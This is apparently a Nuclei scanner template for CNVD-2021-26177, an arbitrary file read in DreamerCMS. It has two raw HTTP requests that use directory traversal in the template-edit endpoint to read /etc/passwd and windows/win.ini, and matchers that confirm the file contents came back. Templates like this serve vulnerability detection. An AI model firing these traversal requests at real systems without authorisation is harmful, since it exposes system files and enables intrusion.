id: CNVD-2021-26177

info:
  name: DreamerCMS - Arbitrary File Read
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template checks for an arbitrary file read vulnerability in DreamerCMS by attempting to read the /etc/passwd file.
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-26177
  tags: DreamerCMS

http:
  - raw:
      - |
        GET /admin/templates/toEdit?path=templates/default&file=../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /admin/templates/toEdit?path=templates/default&file=../../../../../../../../../../../../../windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: regex
        name: linux
        regex:
          - "root:.*?:[0-9]*:[0-9]*:"
        part: body

      - type: word
        name: windows
        words:
          - "for 16-bit app support"
        part: body